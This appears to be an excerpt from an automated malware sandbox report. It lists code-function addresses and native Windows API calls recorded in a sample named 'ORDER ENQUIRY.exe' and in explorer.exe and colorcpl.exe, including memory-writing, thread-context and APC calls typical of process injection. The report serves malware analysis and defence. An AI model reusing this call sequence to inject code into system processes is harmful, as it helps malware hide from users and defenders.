Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2EE0 NtQueueApcThread,	5_2_048D2EE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2E30 NtWriteVirtualMemory,	5_2_048D2E30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2F90 NtProtectVirtualMemory,	5_2_048D2F90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2FA0 NtQuerySection,	5_2_048D2FA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2FB0 NtResumeThread,	5_2_048D2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2F60 NtCreateProcessEx,	5_2_048D2F60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2AB0 NtWaitForSingleObject,	5_2_048D2AB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2AF0 NtWriteFile,	5_2_048D2AF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2B80 NtQueryInformationFile,	5_2_048D2B80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D2BA0 NtEnumerateValueKey,	5_2_048D2BA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D3090 NtSetValueKey,	5_2_048D3090
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D3010 NtOpenDirectoryObject,	5_2_048D3010
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D3D10 NtOpenProcessToken,	5_2_048D3D10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D3D70 NtOpenThread,	5_2_048D3D70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D39B0 NtGetContextThread,	5_2_048D39B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A350 NtCreateFile,	5_2_0288A350
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A480 NtClose,	5_2_0288A480
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A400 NtReadFile,	5_2_0288A400
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A530 NtAllocateVirtualMemory,	5_2_0288A530
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A3FC NtReadFile,	5_2_0288A3FC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A34A NtCreateFile,	5_2_0288A34A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A47A NtClose,	5_2_0288A47A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288A52A NtAllocateVirtualMemory,	5_2_0288A52A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	5_2_0476A036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04769BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	5_2_04769BAF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476A042 NtQueryInformationProcess,	5_2_0476A042
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04769BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_04769BB2

Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_015ED3E4	0_2_015ED3E4
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07730F78	0_2_07730F78
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07730F88	0_2_07730F88
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07738C28	0_2_07738C28
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07730B50	0_2_07730B50
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07733340	0_2_07733340
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_077313C0	0_2_077313C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_077313AF	0_2_077313AF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 0_2_07732A68	0_2_07732A68
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041E0B0	3_2_0041E0B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00401175	3_2_00401175
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041EA70	3_2_0041EA70
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041E28A	3_2_0041E28A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041DBB2	3_2_0041DBB2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041E4C2	3_2_0041E4C2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00402D8C	3_2_00402D8C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00409E4B	3_2_00409E4B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00409E50	3_2_00409E50
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041D6DB	3_2_0041D6DB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041E72C	3_2_0041E72C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_0041DFEA	3_2_0041DFEA
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B801AA	3_2_01B801AA
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B741A2	3_2_01B741A2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B781CC	3_2_01B781CC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0100	3_2_01AB0100
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5A118	3_2_01B5A118
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B48158	3_2_01B48158
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B52000	3_2_01B52000
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACE3F0	3_2_01ACE3F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B803E6	3_2_01B803E6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7A352	3_2_01B7A352
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B402C0	3_2_01B402C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60274	3_2_01B60274
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B80591	3_2_01B80591
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0535	3_2_01AC0535
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6E4F6	3_2_01B6E4F6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B64420	3_2_01B64420
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B72446	3_2_01B72446
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABC7C0	3_2_01ABC7C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0770	3_2_01AC0770
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE4750	3_2_01AE4750
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADC6E0	3_2_01ADC6E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC29A0	3_2_01AC29A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B8A9A6	3_2_01B8A9A6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD6962	3_2_01AD6962
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AA68B8	3_2_01AA68B8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AEE8F0	3_2_01AEE8F0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACA840	3_2_01ACA840
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC2840	3_2_01AC2840
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B76BD7	3_2_01B76BD7
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7AB40	3_2_01B7AB40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABEA80	3_2_01ABEA80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD8DBF	3_2_01AD8DBF
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ABADE0	3_2_01ABADE0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5CD1F	3_2_01B5CD1F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACAD00	3_2_01ACAD00
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B60CB5	3_2_01B60CB5
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB0CF2	3_2_01AB0CF2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0C00	3_2_01AC0C00
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B3EFA0	3_2_01B3EFA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACCFE0	3_2_01ACCFE0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB2FC8	3_2_01AB2FC8
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B62F30	3_2_01B62F30
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B02F28	3_2_01B02F28
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AE0F30	3_2_01AE0F30
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B34F40	3_2_01B34F40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7CE93	3_2_01B7CE93
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AD2E90	3_2_01AD2E90
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7EEDB	3_2_01B7EEDB
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7EE26	3_2_01B7EE26
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC0E59	3_2_01AC0E59
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ACB1B0	3_2_01ACB1B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AF516C	3_2_01AF516C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B8B16B	3_2_01B8B16B
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAF172	3_2_01AAF172
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7F0E0	3_2_01B7F0E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B770E9	3_2_01B770E9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC70C0	3_2_01AC70C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6F0CC	3_2_01B6F0CC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B0739A	3_2_01B0739A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7132D	3_2_01B7132D
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AAD34C	3_2_01AAD34C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC52A0	3_2_01AC52A0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B612ED	3_2_01B612ED
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADB2C0	3_2_01ADB2C0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5D5B0	3_2_01B5D5B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B895C3	3_2_01B895C3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B77571	3_2_01B77571
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7F43F	3_2_01B7F43F
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AB1460	3_2_01AB1460
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7F7B0	3_2_01B7F7B0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B716CC	3_2_01B716CC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B05630	3_2_01B05630
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B55910	3_2_01B55910
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC9950	3_2_01AC9950
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADB950	3_2_01ADB950
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC38E0	3_2_01AC38E0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B2D800	3_2_01B2D800
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADFB80	3_2_01ADFB80
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B35BF0	3_2_01B35BF0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AFDBF9	3_2_01AFDBF9
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7FB76	3_2_01B7FB76
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B05AA0	3_2_01B05AA0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B61AA3	3_2_01B61AA3
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B5DAAC	3_2_01B5DAAC
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B6DAC6	3_2_01B6DAC6
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B33A6C	3_2_01B33A6C
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B77A46	3_2_01B77A46
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7FA49	3_2_01B7FA49
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01ADFDC0	3_2_01ADFDC0
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B77D73	3_2_01B77D73
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC3D40	3_2_01AC3D40
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B71D5A	3_2_01B71D5A
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7FCF2	3_2_01B7FCF2
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B39C32	3_2_01B39C32
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7FFB1	3_2_01B7FFB1
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC1F92	3_2_01AC1F92
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01B7FF09	3_2_01B7FF09
Source: C:\Users\user\Desktop\ORDER ENQUIRY.exe	Code function: 3_2_01AC9EB0	3_2_01AC9EB0
Source: C:\Windows\explorer.exe	Code function: 4_2_10697232	4_2_10697232
Source: C:\Windows\explorer.exe	Code function: 4_2_10696036	4_2_10696036
Source: C:\Windows\explorer.exe	Code function: 4_2_1068D082	4_2_1068D082
Source: C:\Windows\explorer.exe	Code function: 4_2_10691B30	4_2_10691B30
Source: C:\Windows\explorer.exe	Code function: 4_2_10691B32	4_2_10691B32
Source: C:\Windows\explorer.exe	Code function: 4_2_1068ED02	4_2_1068ED02
Source: C:\Windows\explorer.exe	Code function: 4_2_10694912	4_2_10694912
Source: C:\Windows\explorer.exe	Code function: 4_2_1069A5CD	4_2_1069A5CD
Source: C:\Windows\explorer.exe	Code function: 4_2_10D2B082	4_2_10D2B082
Source: C:\Windows\explorer.exe	Code function: 4_2_10D34036	4_2_10D34036
Source: C:\Windows\explorer.exe	Code function: 4_2_10D385CD	4_2_10D385CD
Source: C:\Windows\explorer.exe	Code function: 4_2_10D32912	4_2_10D32912
Source: C:\Windows\explorer.exe	Code function: 4_2_10D2CD02	4_2_10D2CD02
Source: C:\Windows\explorer.exe	Code function: 4_2_10D35232	4_2_10D35232
Source: C:\Windows\explorer.exe	Code function: 4_2_10D2FB32	4_2_10D2FB32
Source: C:\Windows\explorer.exe	Code function: 4_2_10D2FB30	4_2_10D2FB30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0494E4F6	5_2_0494E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04944420	5_2_04944420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04952446	5_2_04952446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04960591	5_2_04960591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A0535	5_2_048A0535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048BC6E0	5_2_048BC6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0489C7C0	5_2_0489C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048C4750	5_2_048C4750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A0770	5_2_048A0770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04932000	5_2_04932000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049601AA	5_2_049601AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049581CC	5_2_049581CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04890100	5_2_04890100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0493A118	5_2_0493A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04928158	5_2_04928158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049202C0	5_2_049202C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04940274	5_2_04940274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049603E6	5_2_049603E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048AE3F0	5_2_048AE3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495A352	5_2_0495A352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04940CB5	5_2_04940CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04890CF2	5_2_04890CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A0C00	5_2_048A0C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048B8DBF	5_2_048B8DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0489ADE0	5_2_0489ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048AAD00	5_2_048AAD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0493CD1F	5_2_0493CD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495CE93	5_2_0495CE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048B2E90	5_2_048B2E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495EEDB	5_2_0495EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495EE26	5_2_0495EE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A0E59	5_2_048A0E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0491EFA0	5_2_0491EFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04892FC8	5_2_04892FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048ACFE0	5_2_048ACFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04942F30	5_2_04942F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048E2F28	5_2_048E2F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048C0F30	5_2_048C0F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04914F40	5_2_04914F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048868B8	5_2_048868B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048CE8F0	5_2_048CE8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A2840	5_2_048A2840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048AA840	5_2_048AA840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A29A0	5_2_048A29A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0496A9A6	5_2_0496A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048B6962	5_2_048B6962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0489EA80	5_2_0489EA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04956BD7	5_2_04956BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495AB40	5_2_0495AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495F43F	5_2_0495F43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04891460	5_2_04891460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0493D5B0	5_2_0493D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04957571	5_2_04957571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049516CC	5_2_049516CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495F7B0	5_2_0495F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A70C0	5_2_048A70C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0494F0CC	5_2_0494F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495F0E0	5_2_0495F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049570E9	5_2_049570E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048AB1B0	5_2_048AB1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048D516C	5_2_048D516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0488F172	5_2_0488F172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0496B16B	5_2_0496B16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A52A0	5_2_048A52A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048BB2C0	5_2_048BB2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_049412ED	5_2_049412ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048E739A	5_2_048E739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495132D	5_2_0495132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0488D34C	5_2_0488D34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495FCF2	5_2_0495FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04919C32	5_2_04919C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048BFDC0	5_2_048BFDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A3D40	5_2_048A3D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04951D5A	5_2_04951D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04957D73	5_2_04957D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A9EB0	5_2_048A9EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A1F92	5_2_048A1F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495FFB1	5_2_0495FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495FF09	5_2_0495FF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A38E0	5_2_048A38E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0490D800	5_2_0490D800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04935910	5_2_04935910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048A9950	5_2_048A9950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048BB950	5_2_048BB950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048E5AA0	5_2_048E5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04941AA3	5_2_04941AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0493DAAC	5_2_0493DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0494DAC6	5_2_0494DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04957A46	5_2_04957A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495FA49	5_2_0495FA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04913A6C	5_2_04913A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048BFB80	5_2_048BFB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04915BF0	5_2_04915BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_048DDBF9	5_2_048DDBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0495FB76	5_2_0495FB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288E284	5_2_0288E284
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288D6DB	5_2_0288D6DB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288E72C	5_2_0288E72C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288E4C2	5_2_0288E4C2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0288DBB2	5_2_0288DBB2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02879E4B	5_2_02879E4B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02879E50	5_2_02879E50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02872FB0	5_2_02872FB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02872D8C	5_2_02872D8C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_02872D90	5_2_02872D90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476A036	5_2_0476A036
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04762D02	5_2_04762D02
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476E5CD	5_2_0476E5CD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04761082	5_2_04761082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_04768912	5_2_04768912
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 5_2_0476B232	5_2_0476B232
